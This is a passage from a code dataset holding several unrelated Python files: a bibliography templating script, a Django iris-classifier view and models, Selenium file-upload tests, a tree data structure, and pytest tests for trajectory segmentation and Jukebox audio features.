mako.template import Template\nfrom mako.lookup import TemplateLookup\n\nfrom pybib import BibParser\n\ndef main(argv=None):\n # Do argv default this way, as doing it in the functional\n 
# declaration sets it at compile time.\n if argv is None:\n argv = sys.argv\n\n # Set up out output via logging module\n output = logging.getLogger(argv[0])\n output.setLevel(logging.DEBUG)\n output_handler = logging.StreamHandler() # Default is sys.stderr\n # Set up formatter to just print message without preamble\n output_handler.setFormatter(logging.Formatter(\"%(message)s\"))\n output.addHandler(output_handler)\n\n # Argument parsing\n parser = argparse.ArgumentParser(\n description=__doc__, # printed with -h/--help\n # Don't mess with format of description\n formatter_class=argparse.RawDescriptionHelpFormatter,\n # To have --help print defaults with trade-off it changes\n # formatting, use: ArgumentDefaultsHelpFormatter\n )\n # Only allow one of debug/quiet mode\n verbosity_group = parser.add_mutually_exclusive_group()\n verbosity_group.add_argument(\"-d\", \"--debug\",\n action='store_const', const=logging.DEBUG,\n dest=\"output_level\", default=logging.INFO,\n help=\"print debugging\")\n verbosity_group.add_argument(\"-q\", \"--quiet\",\n action=\"store_const\", const=logging.WARNING,\n dest=\"output_level\",\n help=\"run quietly\")\n parser.add_argument(\"-t\", \"--template\", required=True,\n help=\"template file\", metavar=\"FILE\")\n parser.add_argument(\"-T\", \"--template_path\",\n action='append',\n help=\"search PATH for templates\", metavar=\"PATH\")\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 1.0\")\n parser.add_argument('bibs', metavar='args', type=str, nargs='+',\n help='bib files to use')\n args = parser.parse_args()\n output_handler.setLevel(args.output_level)\n\n output.info(\"Reading template from {}\".format(args.template))\n mylookup = TemplateLookup(directories=args.template_path,\n input_encoding='utf-8',\n output_encoding='utf-8')\n with open(args.template) as f:\n template_string = \"\".join(f.readlines())\n template = Template(template_string,\n lookup=mylookup,\n default_filters=['decode.utf8'],\n input_encoding='utf-8',\n output_encoding='utf-8')\n\n output.info(\"Parsing bib files\")\n try:\n bib_parser = BibParser()\n entries = bib_parser.parse_bib(args.bibs)\n except Exception as e:\n output.error(\"Error parsing bibliography files\")\n output.error(str(e))\n return 1\n\n substitutions = {\n \"entries\" : entries,\n }\n\n try:\n # Mako doesn't seem to be rendering into utf-8\n # hance decode() here\n print(template.render(**substitutions).decode())\n except Exception as e:\n output.error(\"Error filling in template\")\n output.error(str(e))\n output.error(mako.exceptions.text_error_template().render())\n return 1\n\n return(0)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"von/pyBib","sub_path":"scripts/pyBib.py","file_name":"pyBib.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"6719976686","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\n# Create your views here.\ndef home(request):\n return render(request, 'index.html')\n\n@csrf_exempt\ndef result(request):\n #df = pd.read_csv('iris.csv')\n dataset = pd.read_csv('iris.csv')\n \n y = dataset.species #target coluna alvo\n X = dataset.drop('species', axis=1) #todas ascolunas menos target\n\n#train-test-split\n X_train,X_test,y_train,y_test = 
train_test_split(X,y,test_size=.5)\n\n#train model\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n#captura dados de entrada\n val1=request.POST['SepalLengthCm']\n val2=request.POST['SepalWidthCm']\n val3=request.POST['PetalLengthCm']\n val4=request.POST['PetalWidthCm']\n\n#predition\n pred = model.predict([[val1,val2,val3,val4]])\n print(pred)\n \n context = {\n 'result': pred\n }\n return render(request, 'result.html',context)","repo_name":"rogerio1982/machine_django","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34107638792","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest\nimport time\nimport os\nfrom app import db\nfrom app.models import Category\n\n\nclass Testcase(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(30)\n self.base_url = \"http://localhost:5000/\"\n self.verificationErrors = []\n self.accept_next_alert = True\n\n def check_status(self, test_correct, search_message):\n \"\"\"\n Функция проверяет статус задачи и сравнивает его с эталонным\n\n :param test_correct: Задача должна завершиться успешно или нет\n :param search_message: Сообщение, которое должно вернуть приложение\n :return: Если статус или сообщение не совпадают с эталонным, то ставить тесту статус \"Не пройден\"\n \"\"\"\n driver = self.driver\n # Цикл для ожидания завершения задачи\n for i in range(60):\n status_success = ''\n status_fail = ''\n try:\n status_success = driver.find_element_by_id(\"progressbar\").get_attribute(\"testattribute\")\n except:\n pass\n # Поиска сообщения в ответе приложения\n if status_success == 'suc':\n if test_correct:\n if not (search_message in driver.find_element_by_id(\"upload_alert\").text):\n self.fail(\"incorrect\")\n return True\n else:\n self.fail('incorrect')\n\n try:\n status_fail = driver.find_element_by_id(\"alert_container_fail\").get_attribute(\"testattribute\")\n except:\n pass\n if status_fail == 'fail':\n if not test_correct:\n if not (search_message in driver.find_element_by_id(\"upload_alert\").text):\n self.fail(\"incorrect\")\n return True\n else:\n self.fail('incorrect')\n\n time.sleep(1)\n self.fail('time out')\n\n def test_link_zip_file_correct(self):\n \"\"\"\n Тест корректного zip-архива, скачиваемого по ссылке\n\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n link = \"http://spatialkeydocs.s3.amazonaws.com/FL_insurance_sample.csv.zip\"\n driver.find_element_by_id(\"filename\").send_keys(link)\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_link_zip_file_bad(self):\n \"\"\"\n Тест некорректного zip-архива, скачиваемого по ссылке\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\"http://www.colorado.edu/conflict/peace/download/peace.zip\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильный формат zip-архива')\n\n def test_link_file_correct(self):\n \"\"\"\n Тест корректного файла, скачиваемого по ссылке\n :return:\n \"\"\"\n driver = self.driver\n 
driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\n \"http://samplecsvs.s3.amazonaws.com/Sacramentorealestatetransactions.csv\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_link_bad(self):\n \"\"\"\n Тест некорректной ссылки\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\"incorrect link\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильная ссылка')\n\n def test_disk_zip_file_bad(self):\n \"\"\"\n Тест некорректного zip-файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'bad.zip'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильный формат архива')\n\n def test_disk_zip_file_correct(self):\n \"\"\"\n Тест корректного zip-файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'good.zip'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_disk_file_correct(self):\n \"\"\"\n Тест корректного файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'good.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_disk_file_bad(self):\n \"\"\"\n Тест некорректного файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'bad.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Ошибка кодировки')\n\n def test_database(self):\n \"\"\"\n Тест на правильность количества вставляемых записей\n :return:\n \"\"\"\n initial_count = db.session.query(Category.id).count()\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'test_count.csv'))\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n new_count = 
db.session.query(Category.id).count()\n self.assertEqual(new_count - initial_count, 9)\n\n def is_element_present(self, how, what):\n try:\n self.driver.find_element(by=how, value=what)\n except NoSuchElementException as e:\n return False\n return True\n\n def is_alert_present(self):\n try:\n self.driver.switch_to_alert()\n except NoAlertPresentException as e:\n return False\n return True\n\n def close_alert_and_get_its_text(self):\n try:\n alert = self.driver.switch_to_alert()\n alert_text = alert.text\n if self.accept_next_alert:\n alert.accept()\n else:\n alert.dismiss()\n return alert_text\n finally:\n self.accept_next_alert = True\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"kolotilko/csv_upload","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2947902666","text":"#!/usr/bin/env python3\n\"\"\"Peter Rasmussen, Programming Assignment 3, tree.py\n\nThis module provides the base tree class and the tree error exception class.\n\n\"\"\"\n\n# Standard library imports\nimport collections as c\nimport typing as t\n\n# Local imports\nfrom p3.nodes import ClassificationDecisionNode\n\n\nclass TreeError(Exception):\n pass\n\n\nclass Tree:\n \"\"\"\n Base tree class.\n \"\"\"\n\n def __init__(self):\n self.root: t.Union[ClassificationDecisionNode, None] = None\n self.nodes = c.OrderedDict()\n self.height: t.Union[int, None] = None\n self.node_counter = -1\n\n def __repr__(self):\n return f\"Tree rooted at {self.root}.\"\n\n def add_node(self, node: ClassificationDecisionNode, parent_node: ClassificationDecisionNode = None):\n \"\"\"\n Add node to tree.\n :param node: Node to add\n :param parent_node: Parent node\n \"\"\"\n if self.is_not_empty() and parent_node is None:\n raise TreeError(\"Parent node must be specified when tree is not empty.\")\n\n # Case when tree is empty\n if self.is_empty():\n self.root = node\n node.depth = 0\n self.height = 0\n\n # Case when tree is not empty\n else:\n parent_node.children.append(node)\n node.parent = parent_node\n node.depth = node.parent.depth + 1\n\n node.set_id(self.get_id())\n self.nodes[node.id] = node\n\n # Update tree height\n self.set_height()\n\n def get_height(self) -> int:\n \"\"\"\n Get height of tree.\n :return:Height of tree\n \"\"\"\n if self.is_empty():\n return self.height\n height = 0\n for node_id, node in self.nodes.items():\n if node.depth > height:\n height = node.depth\n self.height = height\n return self.height\n\n def get_id(self):\n self.node_counter += 1\n return self.node_counter\n\n def get_node(self, node_identifier: t.Union[int, str]) -> ClassificationDecisionNode:\n \"\"\"\n Get node by its ID or name.\n :param node_identifier: ID or name of node\n return: Node\n \"\"\"\n if isinstance(node_identifier, int):\n if node_identifier not in self.nodes:\n raise TreeError(f\"Node ID {node_identifier} not in tree.\")\n else:\n return self.nodes[node_identifier]\n elif isinstance(node_identifier, str):\n nodes = [node for node_id, node in self.nodes.items() if node.name == node_identifier]\n if len(nodes) == 0:\n raise TreeError(f\"Node {node_identifier} not in tree.\")\n elif len(nodes) > 1:\n raise TreeError(f\"Duplicate nodes encountered for {node_identifier}.\")\n return nodes[0]\n else:\n raise TypeError(f\"Node is of type {type(node_identifier)} but must be str or 
int.\")\n\n def is_empty(self) -> bool:\n \"\"\"\n Return true if tree has no nodes.\n :return: True if tree is empty\n \"\"\"\n return self.root is None\n\n def is_not_empty(self) -> bool:\n \"\"\"\n Return true if tree has nodes.\n :return: True if tree is not empty\n \"\"\"\n return self.root is not None\n\n def remove_node(self, node: t.Union[str, int, ClassificationDecisionNode]) -> ClassificationDecisionNode:\n \"\"\"\n Remove node from tree.\n :param node: Node to remove\n :return: Removed node\n \"\"\"\n if self.root is None:\n raise TreeError(\"Cannot remove a node from an empty tree.\")\n if isinstance(node, (int, str)):\n node = self.get_node(node)\n if node.depth < self.height - 1:\n msg = \"Can only remove 1) leaves or 2) nodes whose children are only leaves.\"\n raise NotImplementedError(msg)\n\n # Case when node is root and childless\n if node.is_root() and node.is_leaf():\n self.root = None\n self.height = None\n\n # Case when node is a leaf\n elif node.is_leaf():\n node.parent.children.pop(node.name)\n node.parent = None\n\n # Case when node is interior\n elif node.is_interior():\n # Get node to promote\n _, promoted_node = self.select_promotion_node(node)\n # Decrement promoted node's height\n promoted_node.depth -= 1\n if promoted_node.is_interior():\n raise TreeError(f\"Promoted node {promoted_node} is not a leaf but must be.\")\n # Set node's children to empty dict\n node.children = c.defaultdict(lambda: None)\n # If node is root, make promoted node new root and then set promoted node's parent to None\n if node.is_root():\n self.root = promoted_node\n promoted_node.parent = None\n # Otherwise, add promoted node to parent's children, remove node from parent's children, and update promoted node's parent\n else:\n node.parent.children[promoted_node.name] = promoted_node\n node.parent.children.pop(node.name)\n promoted_node.parent = node.parent\n # Un-wire node's parent\n node.parent = None\n\n # Raise an error if above cases have been incorrectly handled\n else:\n raise TreeError(\"Node must be either interior or a leaf.\")\n\n # Remove node from tree's dictionary of nodes\n self.nodes.pop(node.name)\n # Update tree height\n self.set_height()\n\n # Return removed node\n return node\n\n def set_height(self) -> int:\n \"\"\"\n Set height of tree as height of node which has max height.\n :return: Updated height of tree\n \"\"\"\n self.height = self.get_height()\n return self.height\n\n @staticmethod\n def select_promotion_node(parent_node: ClassificationDecisionNode) -> tuple:\n \"\"\"\n Select child node to promote as parent.\n :param parent_node: Parent node of promotion candidates\n :return: Promoted child node name and associated node\n This is a base function that is over-ridden in classes that inherit from this class.\n \"\"\"\n if not parent_node.children:\n raise TreeError(\"Cannot promote non-existent child from a parent node.\")\n # For this base class, just promote the first node encountered in iteration over dict\n for child_node_name, child_node in parent_node.children.items():\n return child_node_name, child_node","repo_name":"pgr-me/RasmussenMLProject3","sub_path":"p3/trees/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34406938949","text":"from django.db import models\n\n# Create your models here.\nclass Restaurante(models.Model):\n\tnome = models.CharField(max_length=100)\n\tdescricao = models.TextField()\n\t# foto = 
models.ImageField() # tem que instalar o PIL\n\tpreco_medio = models.FloatField()\n\tqualidade = models.FloatField()\n\n\tdata_cadastro = models.DateTimeField(auto_now_add=True)\n\t# horario_funcionamento = models.DateTimeField()\n\t#seg_abertura = models.TimeField()\n\t#seg_fechamento = models.TimeField()\n\n\tdef __unicode__(self):\n\t\treturn self.nome\n\n\nclass Comentario(models.Model):\n\tautor = models.CharField(max_length=100)\n\tconteudo = models.TextField()\n\trestaurante = models.ForeignKey('Restaurante')\t","repo_name":"ncometti/ESS-project","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518343001","text":"\"\"\"Tests for low-level trajectory segmentation.\"\"\"\nimport numpy as np\nimport pytest\nfrom gym.spaces import Box\n\nfrom predicators import utils\nfrom predicators.datasets import create_dataset\nfrom predicators.envs import create_new_env\nfrom predicators.ground_truth_models import get_gt_options\nfrom predicators.nsrt_learning.segmentation import segment_trajectory\nfrom predicators.structs import Action, LowLevelTrajectory, \\\n ParameterizedOption, Predicate, State, Type\n\n\ndef test_segment_trajectory():\n \"\"\"Tests for segment_trajectory().\"\"\"\n utils.reset_config({\"segmenter\": \"option_changes\"})\n cup_type = Type(\"cup_type\", [\"feat1\"])\n cup0 = cup_type(\"cup0\")\n cup1 = cup_type(\"cup1\")\n cup2 = cup_type(\"cup2\")\n pred0 = Predicate(\"Pred0\", [cup_type], lambda s, o: s[o[0]][0] > 0.5)\n pred1 = Predicate(\"Pred1\", [cup_type, cup_type],\n lambda s, o: s[o[0]][0] > 0.5)\n pred2 = Predicate(\"Pred2\", [cup_type], lambda s, o: s[o[0]][0] > 0.5)\n preds = {pred0, pred1, pred2}\n state0 = State({cup0: [0.4], cup1: [0.7], cup2: [0.1]})\n atoms0 = utils.abstract(state0, preds)\n state1 = State({cup0: [0.8], cup1: [0.3], cup2: [1.0]})\n atoms1 = utils.abstract(state1, preds)\n # Tests with known options.\n param_option = utils.SingletonParameterizedOption(\n \"Dummy\",\n lambda s, m, o, p: Action(p),\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n )\n option0 = param_option.ground([cup0], np.array([0.2]))\n assert option0.initiable(state0)\n action0 = option0.policy(state0)\n # The option changes, but the option spec stays the same. 
Want to segment.\n # Note that this is also a test for the case where the final option\n # terminates in the final state.\n option1 = param_option.ground([cup0], np.array([0.1]))\n assert option1.initiable(state0)\n action1 = option1.policy(state0)\n option2 = param_option.ground([cup1], np.array([0.1]))\n assert option2.initiable(state0)\n action2 = option2.policy(state0)\n known_option_ll_traj = LowLevelTrajectory(\n [state0.copy() for _ in range(5)],\n [action0, action1, action2, action0])\n known_option_atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms0]\n known_option_segments = segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)\n assert len(known_option_segments) == 4\n # Test case where the final option does not terminate in the final state.\n infinite_param_option = ParameterizedOption(\n \"InfiniteDummy\",\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n policy=lambda s, m, o, p: Action(p),\n initiable=lambda s, m, o, p: True,\n terminal=lambda s, m, o, p: False,\n )\n infinite_option = infinite_param_option.ground([cup0], np.array([0.2]))\n states = [state0.copy() for _ in range(5)]\n infinite_option.initiable(states[0])\n actions = [infinite_option.policy(s) for s in states[:-1]]\n atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms1]\n assert len(\n segment_trajectory(LowLevelTrajectory(states, actions), preds,\n atom_seq)) == 0\n\n # More tests for temporally extended options.\n def _initiable(s, m, o, p):\n del s, o, p # unused\n m[\"steps_remaining\"] = 3\n return True\n\n def _policy(s, m, o, p):\n del s, o # unused\n m[\"steps_remaining\"] -= 1\n return Action(p)\n\n def _terminal(s, m, o, p):\n del s, o, p # unused\n return m[\"steps_remaining\"] <= 0\n\n three_step_param_option = ParameterizedOption(\n \"ThreeStepDummy\",\n types=[cup_type],\n params_space=Box(0.1, 1, (1, )),\n policy=_policy,\n initiable=_initiable,\n terminal=_terminal,\n )\n\n def _simulate(s, a):\n del a # unused\n return s.copy()\n\n three_option0 = three_step_param_option.ground([cup0], np.array([0.2]))\n three_option1 = three_step_param_option.ground([cup0], np.array([0.2]))\n policy = utils.option_plan_to_policy([three_option0, three_option1])\n traj = utils.run_policy_with_simulator(\n policy,\n _simulate,\n state0,\n termination_function=lambda s: False,\n max_num_steps=6)\n atom_traj = [atoms0] * 3 + [atoms1] * 3 + [atoms0]\n segments = segment_trajectory(traj, preds, atom_traj)\n assert len(segments) == 2\n segment0 = segments[0]\n segment1 = segments[1]\n assert segment0.has_option()\n assert segment0.get_option() == three_option0\n assert segment0.init_atoms == atoms0\n assert segment0.final_atoms == atoms1\n assert segment1.has_option()\n assert segment1.get_option() == three_option1\n assert segment1.init_atoms == atoms1\n assert segment1.final_atoms == atoms0\n\n # Tests without known options.\n action0 = option0.policy(state0)\n action0.unset_option()\n action1 = option0.policy(state0)\n action1.unset_option()\n action2 = option1.policy(state0)\n action2.unset_option()\n # Should crash, because the option_changes segmenter assumes that options\n # are known.\n with pytest.raises(AssertionError):\n segment_trajectory(\n LowLevelTrajectory([state0.copy() for _ in range(5)],\n [action0, action1, action2, action0]), preds,\n [atoms0, atoms0, atoms0, atoms0, atoms0])\n # Test oracle segmenter with known options. 
Should be the same as option\n # changes segmenter.\n utils.reset_config({\"segmenter\": \"oracle\"})\n known_option_segments = segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)\n assert len(known_option_segments) == 4\n # Segment with atoms changes instead.\n utils.reset_config({\"segmenter\": \"atom_changes\"})\n assert len(\n segment_trajectory(known_option_ll_traj, preds,\n known_option_atom_seq)) == 0\n unknown_option_ll_traj = LowLevelTrajectory(\n [state0.copy() for _ in range(5)] + [state1],\n [action0, action1, action2, action0, action1])\n atom_seq = [atoms0, atoms0, atoms0, atoms0, atoms0, atoms1]\n unknown_option_segments = segment_trajectory(unknown_option_ll_traj, preds,\n atom_seq)\n assert len(unknown_option_segments) == 1\n segment = unknown_option_segments[0]\n assert len(segment.actions) == 5\n assert not segment.has_option()\n assert segment.init_atoms == atoms0\n assert segment.final_atoms == atoms1\n # Test segmenting at every step.\n utils.reset_config({\"segmenter\": \"every_step\"})\n every_step_segments = segment_trajectory(unknown_option_ll_traj, preds,\n atom_seq)\n assert len(every_step_segments) == 5\n # Test oracle segmenter with unknown options. This segmenter uses the\n # ground truth NSRTs, so we need to use a real environment where those\n # are defined.\n utils.reset_config({\n \"segmenter\": \"oracle\",\n \"option_learner\": \"oracle\",\n \"env\": \"cover_multistep_options\",\n \"cover_multistep_thr_percent\": 0.99,\n \"cover_multistep_bhr_percent\": 0.99,\n \"cover_initial_holding_prob\": 0.0,\n \"cover_num_blocks\": 1,\n \"cover_num_targets\": 1,\n \"num_train_tasks\": 1,\n \"offline_data_method\": \"demo\",\n })\n env = create_new_env(\"cover_multistep_options\", do_cache=False)\n train_tasks = [t.task for t in env.get_train_tasks()]\n assert len(train_tasks) == 1\n dataset = create_dataset(env, train_tasks, known_options=set())\n ground_atom_dataset = utils.create_ground_atom_dataset(\n dataset.trajectories, env.predicates)\n assert len(ground_atom_dataset) == 1\n trajectory = ground_atom_dataset[0]\n ll_traj, atoms = trajectory\n assert train_tasks[0].goal.issubset(atoms[-1])\n assert len(ll_traj.actions) > 0\n assert not ll_traj.actions[0].has_option()\n segments = segment_trajectory(ll_traj, env.predicates, atoms)\n # Should be 2 because the hyperparameters force the task to be exactly\n # one pick and one place.\n assert len(segments) == 2\n # Test unknown segmenter.\n utils.reset_config({\"segmenter\": \"not a real segmenter\"})\n with pytest.raises(NotImplementedError):\n segment_trajectory(ll_traj, env.predicates, atoms)\n\n\n@pytest.mark.parametrize(\"env\", [\n \"stick_button\", \"cover_multistep_options\", \"doors\", \"coffee\",\n \"touch_point\", \"blocks\", \"exit_garage\"\n])\ndef test_contact_based_segmentation(env):\n \"\"\"Tests for contact-based segmentation.\"\"\"\n utils.reset_config({\n \"segmenter\": \"contacts\",\n \"env\": env,\n \"num_train_tasks\": 1,\n \"offline_data_method\": \"demo\",\n \"doors_room_map_size\": 2,\n \"doors_min_room_exists_frac\": 1.0,\n \"doors_max_room_exists_frac\": 1.0,\n \"doors_birrt_smooth_amt\": 0,\n \"exit_garage_clear_refine_penalty\": 0,\n \"exit_garage_min_num_obstacles\": 3,\n \"exit_garage_max_num_obstacles\": 3,\n \"exit_garage_raise_environment_failure\": True,\n \"exit_garage_motion_planning_ignore_obstacles\": True,\n # Exclude all predicates, because contact-based segmentation should\n # be invariant to excluded predicates.\n \"excluded_predicates\": \"all\",\n 
})\n env = create_new_env(env, do_cache=False)\n train_tasks = [t.task for t in env.get_train_tasks()]\n assert len(train_tasks) == 1\n dataset = create_dataset(env, train_tasks, get_gt_options(env.get_name()))\n ground_atom_dataset = utils.create_ground_atom_dataset(\n dataset.trajectories, env.predicates)\n assert len(ground_atom_dataset) == 1\n trajectory = ground_atom_dataset[0]\n ll_traj, atoms = trajectory\n assert train_tasks[0].goal.issubset(atoms[-1])\n assert len(ll_traj.actions) > 0\n assert ll_traj.actions[0].has_option()\n segments = segment_trajectory(ll_traj, env.predicates, atoms)\n # The options should be grouped together.\n for segment in segments:\n assert len(segment.actions) > 0\n segment_option = segment.get_option()\n for action in segment.actions:\n assert action.get_option() is segment_option\n\n\ndef test_contact_based_segmentation_failure_case():\n \"\"\"Failure case tests for contact-based segmentation.\"\"\"\n utils.reset_config({\n \"segmenter\": \"contacts\",\n \"env\": \"not a real env\",\n })\n with pytest.raises(NotImplementedError) as e:\n segment_trajectory([], set(), [])\n assert \"Contact-based segmentation not implemented\" in str(e)\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"tests/nsrt_learning/test_segmentation.py","file_name":"test_segmentation.py","file_ext":"py","file_size_in_byte":10588,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"40945793645","text":"import tempfile\nimport unittest\n\nimport librosa\nimport numpy as np\nfrom scipy.io.wavfile import read as wavread\n\nfrom ..assets import retrieve_asset\nfrom ..utils import compute_checksum\nfrom .jukebox import _CHUNK_FRAMES, _SAMPLE_RATE, Jukebox\n\n_TEST_NUM_LAYERS = 36\n\n\nclass TestJukebox(unittest.TestCase):\n def test_singleton(self):\n Jukebox(num_layers=_TEST_NUM_LAYERS)\n with self.assertRaisesRegex(Exception, \"initialized once\"):\n Jukebox(num_layers=1)\n\n def test_decode_audio_strict(self):\n # NOTE: *Very* strict test to check the decoding stack against training config.\n # Versions: ffmpeg 4.3.2-0york0~18.04, librosa 0.7.2, resampy 0.2.2\n audio = Jukebox.decode_audio(retrieve_asset(\"TEST_MP3\"))\n _, audio_ref = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n self.assertTrue(np.array_equal(audio, audio_ref))\n\n def test_codify_audio(self):\n # NOTE: *Pretty* strict test to check VQVAE against training.\n # Versions: torch 1.4.0+cu101\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n _, audio = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n audio_codified = jukebox.codify_audio(audio)\n self.assertEqual(audio_codified.shape, (8192,))\n self.assertEqual(np.unique(audio_codified).shape[0], 432)\n self.assertEqual(\n compute_checksum(str(audio_codified.tolist()).encode(\"utf-8\")),\n \"2569ffae9819a43a0e4ba29f3caa5ecab6d4b2a8e1b3fde0a65bbf6532a7e479\",\n )\n self.assertEqual(np.unique(audio_codified[1580:]).tolist(), [653, 1489])\n\n audio_codified_nopad = jukebox._codify_audio(audio, pad=False)\n self.assertEqual(audio_codified_nopad.shape, (1580,))\n eq = audio_codified[: audio_codified_nopad.shape[0]] == audio_codified_nopad\n acc = eq.astype(np.float32).mean()\n self.assertAlmostEqual(acc, 0.9994, places=4)\n\n def test_lm_activations(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n _, audio = wavread(retrieve_asset(\"TEST_MP3_JUKEBOX_DECODE_REF\"))\n audio_codified = jukebox.codify_audio(audio)\n\n audio_activations = 
jukebox.lm_activations(audio_codified)\n self.assertEqual(audio_activations.shape, (8192, 4800))\n self.assertAlmostEqual(np.abs(audio_activations).mean(), 6.3359, places=4)\n self.assertAlmostEqual(\n np.abs(audio_activations).astype(np.float64).sum(), 249135949.1, places=1\n )\n\n def test_extract(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS, fp16=True)\n mp3_path = retrieve_asset(\"TEST_MP3\")\n rate, audio_activations = jukebox(mp3_path)\n self.assertAlmostEqual(rate, 344.5, places=1)\n self.assertEqual(audio_activations.shape, (1580, 4800))\n self.assertAlmostEqual(np.abs(audio_activations).mean(), 1.7705, places=4)\n self.assertAlmostEqual(\n np.abs(audio_activations).astype(np.float64).sum(), 13425792.4, places=1\n )\n\n def test_edge_cases(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n jukebox(\n retrieve_asset(\"YOUTUBE_ZqJiXLJs_Pg\"),\n offset=281.66999999999996,\n duration=15.360000000000014,\n )\n\n def test_legacy(self):\n jukebox = Jukebox(num_layers=_TEST_NUM_LAYERS)\n audio = jukebox.decode_audio(retrieve_asset(\"TEST_JUKEBOX_LEGACY\"))\n audio = audio[: 25 * _SAMPLE_RATE]\n codified_audio = jukebox._codify_audio(audio, window_size=25 * _SAMPLE_RATE)\n codified_audio = codified_audio[:_CHUNK_FRAMES]\n activations = jukebox.lm_activations(\n codified_audio, metadata_total_length_seconds=62\n )\n expected = np.load(retrieve_asset(\"TEST_JUKEBOX_LEGACY_REF\"))\n recomputed = np.mean(activations, axis=0)\n err = np.abs(recomputed - expected).sum()\n self.assertLess(err, 